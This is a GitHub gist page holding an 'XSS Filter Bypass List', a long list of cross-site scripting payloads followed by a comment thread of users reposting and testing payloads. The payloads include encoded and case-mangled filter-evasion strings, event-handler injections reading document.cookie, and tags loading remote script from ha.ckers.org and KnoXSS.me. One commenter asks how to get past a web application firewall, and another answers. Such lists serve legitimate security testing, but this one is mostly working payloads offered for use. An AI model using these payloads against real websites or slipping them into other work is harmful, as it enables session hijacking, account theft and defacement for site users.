Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC=" &#14; javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
</script><script>alert('XSS');</script>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"
veris-->group<svg/onload=alert(/XSS/)//
#"><img src=M onerror=alert('XSS');>
element[attribute='<img src=x onerror=alert('XSS');>
[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]
%22;alert%28%27RVRSH3LL_XSS%29//
javascript:alert%281%29;
<w contenteditable id=x onfocus=alert()>
alert;pg("XSS")
<svg/onload=%26%23097lert%26lpar;1337)>
<script>for((i)in(self))eval(i)(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>
<sCR<script>iPt>alert(1)</SCr</script>IPt>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a>
@ninja25538

This comment has been minimized.

Copy link

commented Aug 8, 2017

Nice!, Thanks!

@Noob-Walid

This comment has been minimized.

Copy link

commented Oct 12, 2017

which worked most??

@Cache-Bounty

This comment has been minimized.

Copy link

commented Apr 6, 2018

test

@CesBear

This comment has been minimized.

Copy link

commented May 8, 2018

cool

@xeno6696

This comment has been minimized.

Copy link

commented May 10, 2018

@Noob-Walid: It's doubtful that any of these are going to "work" right out of the box. You'll want to use a fuzzer against a suspected form field, and see what tag types even partially "make it through." Though, all of these inputs are available at OWASP, and actually are also available from both fuzzdb and SecLists in text files that contain the name "rsnake."

As a matter of fact, all of you should just clone those repos.

@0xINT3

This comment has been minimized.

Copy link

commented Sep 1, 2018

many don't even work. websites are getting smart. :/

@sittminzaw

This comment has been minimized.

Copy link

commented Sep 5, 2018

"autofocus/onfocus=alert(`Bug´)-->
also work

@IvanGuGon1

This comment has been minimized.

Copy link

commented Jan 1, 2019

<SCRIPT>document.write("PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
@Marshmellow471

This comment has been minimized.

Copy link

commented Jan 26, 2019

@Marshmellow471

This comment has been minimized.

Copy link

commented Jan 26, 2019

rip github xss protection

@Marshmellow471

This comment has been minimized.

Copy link

commented Jan 26, 2019

here, sons. <img src = x onerror = alert( document.cookies ) >

@Marshmellow471

This comment has been minimized.

Copy link

commented Jan 26, 2019

start with > and without the spaces

@Marshmellow471

This comment has been minimized.

Copy link

commented Jan 26, 2019

fuck

@Marshmellow471

This comment has been minimized.

Copy link

commented Jan 26, 2019

<h1>no</h1>

@Marshmellow471

This comment has been minimized.

Copy link

commented Jan 26, 2019

no

@shamrocksu88

This comment has been minimized.

Copy link

commented Feb 1, 2019

KNOX

@shamrocksu88

This comment has been minimized.

Copy link

commented Feb 1, 2019

KNOX

@shamrocksu88

This comment has been minimized.

Copy link

commented Feb 1, 2019

S05PWA==

@shamrocksu88

This comment has been minimized.

Copy link

commented Feb 1, 2019

PDFLTk9YPDE=

@shamrocksu88

This comment has been minimized.

Copy link

commented Feb 1, 2019

'"KNOX

@shamrocksu88

This comment has been minimized.

Copy link

commented Feb 1, 2019

KNOX\

@shamrocksu88

This comment has been minimized.

Copy link

commented Feb 1, 2019

confirmK

@shamrocksu88

This comment has been minimized.

Copy link

commented Feb 1, 2019

(confirm)(1)

@shamrocksu88

This comment has been minimized.

Copy link

commented Feb 1, 2019

'-confirmK-'

@shamrocksu88

This comment has been minimized.

Copy link

commented Feb 1, 2019

"-confirmK-"

@shamrocksu88

This comment has been minimized.

Copy link

commented Feb 1, 2019

${(confirm)(1)}

@shamrocksu88

This comment has been minimized.

Copy link

commented Feb 1, 2019

1</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=https://KnoXSS.me\x2F00?1=6243>

@nizeman72

This comment has been minimized.

Copy link

commented Feb 12, 2019

<sCR<script>iPt>alert(1)</SCr</script>IPt>

@nizeman72

This comment has been minimized.

Copy link

commented Feb 12, 2019

iji

@nizeman72

This comment has been minimized.

Copy link

commented Feb 12, 2019

<SCRIPT>document.write("PT SRC="http://ha.ckers.org/xss.js"</SCRIPT>
@nizeman72

This comment has been minimized.

Copy link

commented Feb 12, 2019

<script>document.write("PT SRC="http://ha.ckers.org/xss.js"></script>
@nizeman72

This comment has been minimized.

Copy link

commented Feb 12, 2019

<script>document.write("pt src="http://ha.ckers.org/xss.js"></script>
@nizeman72

This comment has been minimized.

Copy link

commented Feb 12, 2019

<script>document.write("pt src="http://ha.ckers.org/xss.js"</script>
@nizeman72

This comment has been minimized.

Copy link

commented Feb 12, 2019

<img src=xonerror=alert( document.cookies)>

@nizeman72

This comment has been minimized.

Copy link

commented Feb 12, 2019

<img src = x onerror = alert( document.cookies ) >

@nizeman72

This comment has been minimized.

Copy link

commented Feb 12, 2019

<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>

@nizeman72

This comment has been minimized.

Copy link

commented Feb 12, 2019

</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=https://KnoXSS.me\x2F00?1=6243>

@nizeman72

This comment has been minimized.

Copy link

commented Feb 12, 2019

</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=`https://KnoXSS.me\x2F00?1=6243</script>

@nizeman72

This comment has been minimized.

Copy link

commented Feb 12, 2019

</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=https://KnoXSS.me\x2F00?1=6243>

@nizeman72

This comment has been minimized.

Copy link

commented Feb 12, 2019

@nizeman72

This comment has been minimized.

Copy link

commented Feb 16, 2019

Lol

@nizeman72

This comment has been minimized.

Copy link

commented Feb 16, 2019

test

@nizeman72

This comment has been minimized.

Copy link

commented Feb 16, 2019

<script>alert(fuck)</script>
@Yashin2134

This comment has been minimized.

Copy link

commented Feb 22, 2019

@Yashin2134

This comment has been minimized.

Copy link

commented Feb 22, 2019

Skip to content
Search…
All gists
Back to GitHub
New gist
@Yashin2134
187
68 @rvrsh3llrvrsh3ll/xxsfilterbypass.lst
Last active 2 days ago •

<script src="https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec.js"></script>

Code Revisions 4 Stars 187 Forks 68
XSS Filter Bypass List
xxsfilterbypass.lst
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"=&{()}
0"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

xxs link xxs link

<SCRIPT>alert("XSS")</SCRIPT>">

@Yashin2134

This comment has been minimized.

Copy link

commented Feb 22, 2019

<SCRIPT>alert("XSS")</SCRIPT>">

@wlanpsk

This comment has been minimized.

Copy link

commented Mar 28, 2019

Mmm

@EDMPL

This comment has been minimized.

Copy link

commented Apr 1, 2019

test

@EDMPL

This comment has been minimized.

Copy link

commented Apr 1, 2019

nice

@s04v

This comment has been minimized.

Copy link

commented Apr 9, 2019

Test

@itayze

This comment has been minimized.

Copy link

commented Apr 13, 2019

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

@ABCyborg25

This comment has been minimized.

Copy link

commented Apr 15, 2019

Hi All,

I am new to InfoSec and need a small help from you dignitaries

While performing XSS what if my web aplication Firewall is blocking certain words like Alert, Script etc.

TIA for your answers!

@m1lw0rm

This comment has been minimized.

Copy link

commented Apr 16, 2019

@m1lw0rm

This comment has been minimized.

Copy link

commented Apr 16, 2019

@T3ap0T

This comment has been minimized.

Copy link

commented Apr 18, 2019

rofl xss in the comments
plz

@UnknownUserG

This comment has been minimized.

Copy link

commented Apr 26, 2019

Prompt('XSS') can be used in place of Alert('XSS') if the alert keyword is blocked

@r3dx00

This comment has been minimized.

Copy link

commented Apr 28, 2019

Markdown allows bold txt and e.t.c, why y'all flexing ?

@Pr070n321

This comment has been minimized.

Copy link

commented May 7, 2019

AAA

@Pr070n321

This comment has been minimized.

Copy link

commented May 7, 2019

AAA

@Pr070n321

This comment has been minimized.

Copy link

commented May 7, 2019

AAA

@Pr070n321

This comment has been minimized.

Copy link

commented May 7, 2019

AAA

@Pr070n321

This comment has been minimized.

Copy link

commented May 7, 2019

AAA

@Pr070n321

This comment has been minimized.

Copy link

commented May 7, 2019

s

@Pr070n321

This comment has been minimized.

Copy link

commented May 7, 2019

s

@Pr070n321

This comment has been minimized.

Copy link

commented May 7, 2019

a

@Pr070n321

This comment has been minimized.

Copy link

commented May 7, 2019

a

@Pr070n321

This comment has been minimized.

Copy link

commented May 7, 2019

a

@Pr070n321

This comment has been minimized.

Copy link

commented May 7, 2019

a

@Sachinkumar1245

This comment has been minimized.

Copy link

commented May 9, 2019

"><img src=x onerror=confirm(12);

@DrShrox

This comment has been minimized.

Copy link

commented Jun 25, 2019

a

@DrShrox

This comment has been minimized.

Copy link

commented Jun 25, 2019

<script>alert("xss")</script>
@DrShrox

This comment has been minimized.

Copy link

commented Jun 25, 2019

@darkness203

This comment has been minimized.

Copy link

commented Jun 28, 2019

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"=&{()}
0"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

xxs link xxs link

<SCRIPT>alert("XSS")</SCRIPT>">

@realarrch

This comment has been minimized.

Copy link

commented Jul 1, 2019

TEST

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.